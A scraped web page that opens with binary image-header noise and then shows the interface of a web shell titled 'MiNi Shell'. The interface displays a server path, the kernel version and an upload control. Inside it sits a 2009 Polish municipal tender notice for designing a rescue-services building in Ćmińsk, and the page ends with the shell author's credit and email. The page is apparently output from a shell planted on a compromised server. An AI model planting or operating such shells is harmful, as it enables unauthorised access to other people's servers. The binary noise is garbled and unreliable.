JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/149348-N-2009.html

<p class="kh_header"><b>Miedziana Góra: WYKONANIE PROJEKTU BUDOWLANO - WYKONAWCZEGO OBIEKTU ZESPOŁU SŁUŻB RATOWNICZYCH W ĆMIŃSKU</b><br>
<b>Numer ogłoszenia: 149348 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miedziana Góra , ul. Urzędnicza 18, 26-085 Miedziana Góra, woj. świętokrzyskie, tel. 041 303-16-26, faks 041 303-16-05.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE PROJEKTU BUDOWLANO - WYKONAWCZEGO OBIEKTU ZESPOŁU SŁUŻB RATOWNICZYCH W ĆMIŃSKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zamówienie obejmuje wykonanie dokumentacji projektowej składającej się z następujących opracowań:
1.1. Projektu budowlano - wykonawczego budynku Zespołu Służb Ratowniczych w Ćmińsku, obejmującego wykonanie m.in.:
1) projektu zagospodarowania terenu wraz z drogami wewnętrznymi, oświetleniem terenu, zielenią i obiektami małej architektury;
2) projektu architektonicznego wraz z technologią; 
3) projektu konstrukcyjnego;
4) projektu instalacji sanitarnych wraz z technologią kotłowni na gaz oraz gruntowe pompy ciepła;  
5) projektu instalacji elektrycznych;
6) projektu instalacji telefonicznej, LAN/WAN, DSP alarmowej jednostek ratowniczych oraz monitoring w postaci kamer;
7) projektów przyłączy;
8) przyobiektowej oczyszczalni ścieków lub zbiornika na ścieki sanitarne;
9) systemu podczyszczania wód opadowych z terenów utwardzonych oraz parkingów; 
10) przedmiarów robót. 

1.2. Projektu budowlano - wykonawczego Placu ćwiczeń  i zawodów strażackich ze spełnieniem, wymagań regulaminów krajowych i UE, obejmującego wykonanie m.in.:
1) projektu zagospodarowania terenu,
2) wykazu wyposażenia, 
3) przedmiarów robót 

1.3. Projektu budowlano - wykonawczego Wielorozwojowego toru przeszkód dla młodzieży, obejmującego wykonanie m.in.:
1) projektu zagospodarowania terenu,
2) wykazu wyposażenia, 
3) przedmiarów robót 

1.4. Projektu budowlano - wykonawczego elektrowni wiatrowej dla potrzeb własnych o wysokości do 30 m, obejmującego wykonanie m.in.: 
1) projektu konstrukcyjnego;
2) projektu elektrycznego;  
3) przedmiarów robót. 
  
1.5. Dokumentacji kosztorysowo - odbiorowej, składającej się z:

1) kosztorysów inwestorskich,
2) kosztorysów ślepych, 
3) specyfikacji technicznych wykonania i odbioru robót.  

2. Przedmiot zamówienia należy opracować w ilości:
1) Dokumentacja projektowa - 6 egz. w formie papierowej oraz 1 egz. w formie elektronicznej (format .pdf oraz .dwg).   
2) Przedmiary robót - 4 egz. w formie papierowej oraz 1 egz. w formie elektronicznej (format .pdf oraz .kst).   
3) Kosztorysy inwestorskie - 1 egz. w formie papierowej oraz 1 egz. w formie elektronicznej (format .kst).   
4) Kosztorysy ofertowe - 1 egz. w formie papierowej oraz 1 egz. w formie elektronicznej (format .pdf).
3. Wykonanie przedmiotu zamówienia poprzedzone będzie wykonaniem koncepcji projektowej obejmujących projekt zagospodarowania terenu oraz architekturę budynku. Po uzyskaniu akceptacji Zamawiającego, Wykonawca przedstawi szacunkowe koszty jednostkowe a następnie opracuje przedmiot zamówienia.   
4. Przedmiot zamówienia szczegółowo opisano w wytycznych projektowych stanowiących - załącznik    nr 1 do SIWZ;    

Uwaga:
Proponowane materiały i urządzenia należy opisywać za pomocą parametrów technicznych tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia to Wykonawca zobowiązany jest do podania co najmniej dwóch producentów tych materiałów lub urządzeń;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 5.000,00 PLN (słownie: pięć tysięcy zł).
2. Wadium musi być wniesione przed upływem terminu składania ofert w następujących formach,                         w zależności od wyboru Wykonawcy:
a) pieniądzu, przelewem na rachunek bankowy: 
w Banku Spółdzielczym w Kielcach, Oddział Miedziana Góra, nr 75 8493 0004 0020 0303 0078 0006 
na potwierdzenie należy załączyć do oferty dowód wpłaty (na przelewie -  Wadium -  Wykonanie projektu budowlano - wykonawczego obiektu Zespołu Służb Ratowniczych w Ćmińsku).
    b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że, poręczenie kasy może być wyłącznie poręczeniem pieniężnym,   
    c) gwarancjach bankowych, 
    d) w gwarancjach ubezpieczeniowych
    e) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 
        listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109,                         
        poz. 1158 ze zm.).
3. Wadium należy wnieść przed upływem terminu składania ofert. 
4. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone w oryginale, musi obejmować cały okres związania ofertą, określony w ust. 10 oraz winno zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń. Zwrot bądź zatrzymanie wadium będzie się odbywać na zasadach określonych w ustawie PZP.
4.1.	Zamawiający zatrzymuje wadium, jeżeli wykonawca, którego oferta została wybrana:
-  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
-  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
4.2.	Zamawiający zatrzymuje wadium, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w ust.6 pkt 2 SIWZ, nie złożył dokumentów, o których mowa w ust.6 pkt 1 SIWZ oraz pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
5. Oferta niezabezpieczona akceptowalną formą wadium zostanie odrzucona bez rozpatrywania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki: 
1. Spełniają warunki udziału w postępowaniu o udzielenie zamówienia publicznego określone w art. 22 ust.1 ustawy PZP.
2. Prowadzą działalność gospodarczą w zakresie zgodnym z przedmiotem zamówienia.
3. Posiadają niezbędną wiedze i doświadczenie to znaczy w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania, a jeśli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie, wykonali co najmniej:
- dwa projekty budynków użyteczności publicznej ( w rozumieniu Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie - Dz. U. z dnia 15 czerwca 2002 r. z póź, zm.) o wartości kosztorysowej wraz z instalacjami wewnętrznymi minimum 1.000.000,00 PLN (brutto) każdy. 
4. Dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia:
4.1. Projektantów oraz sprawdzających posiadających wymagane uprawnienia budowlane w specjalności architektonicznej. 
4.2. Projektantów oraz sprawdzających posiadających wymagane uprawnienia budowlane w specjalności konstrukcyjnej. 
4.3. Projektantów oraz sprawdzających posiadających wymagane uprawnienia budowlane w specjalności  sanitarnej,
4.4. Projektantów oraz sprawdzających posiadających wymagane uprawnienia budowlane w specjalności  instalacji elektrycznych, 
- należącymi do odpowiedniej Izby Samorządu Zawodowego i posiadającymi ubezpieczenie od odpowiedzialności cywilnej.
Zamawiający oceni spełnienie warunków wg kryteriów  spełnia lub  nie spełnia  na podstawie załączonych do oferty dokumentów, o których mowa w ust. 6 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1 Dokumenty wymagane:      
1)	oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 ustawy PZP -                z wykorzystaniem wzoru - zał. nr 1 do oferty; 
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - zał. nr 2 do oferty;
3)  wykaz wykonanych robót projektowych w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających rodzajem i wartością wymogom  określonym w ust.5 pkt 3 SIWZ, z podaniem ich wartości oraz daty i miejsca wykonania - z wykorzystaniem wzoru - załącznik nr 3 do oferty, oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie, np. referencji, protokoły odbioru.  
4) wykaz wraz z dokumentami osób, którymi dysponuje lub będzie dysponował Wykonawca stwierdzające, że projektanci i sprawdzający posiadają wymagane uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności: architektonicznej, konstrukcyjnej, sanitarnej, instalacji i urządzeń elektrycznych, wraz z aktualnym zaświadczeniem o przynależności do izby samorządu zawodowego - załącznik nr 4 do oferty.
            Uwaga: w wykazie Wykonawca winien wskazać osoby którymi dysponuje oraz osoby którymi może   
            dysponować na podstawie zobowiązania innych podmiotów do udostępnienia osób zdolnych do  
            wykonania zamówienia, wraz z pisemnym zobowiązaniem tych podmiotów do udostępnienia osób 
           wymienionych w wykazie.  
2. Uwaga:
2.1.	Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. 
Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie później niż 
w dniu, w którym upłynął termin składania ofert.

2.2.	Zamawiający wzywa wykonawców w wyznaczonym przez siebie terminie do złożenia wyjaśnień dotyczących oświadczeń i dokumentów.

3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej                   w celu potwierdzenia, że posiada uprawnienie do wykonywania  określonej działalności zamiast dokumentu - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej składa dokument o którym mowa w § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane ( Dz. U. Nr 87 poz. 605). 

4. Dokumenty wymagane w przypadku składania oferty wspólnej.
Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego.
Zgodnie z art. 23 ust. 3 ustawy PZP przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, a zatem każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia jest obowiązany złożyć oddzielnie dokumenty,                     o których mowa ust.6 pkt 1 ppkt 1, 2 natomiast pełnomocnik w imieniu wykonawców musi złożyć wspólnie dokumenty o których mowa w ust.6 pkt 1 ppkt 3, 4. Ponadto zgodnie z art. 23 ust. 2 PZP pełnomocnik przedkłada pełnomocnictwo, które musi mieć formę pisemną. 
Dokumenty, o których mowa w niniejszym rozdziale mogą być złożone w formie oryginałów lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
Dokumenty sporządzone w języku obcym powinny być złożone wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.miedziana-gora.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Miedziana Góra ul. Urzędnicza 18 
26-085  Miedziana Góra (sekretariat).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2009 godzina 11:00, miejsce: Urząd Gminy Miedziana Góra ul. Urzędnicza 18 
26-085  Miedziana Góra (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com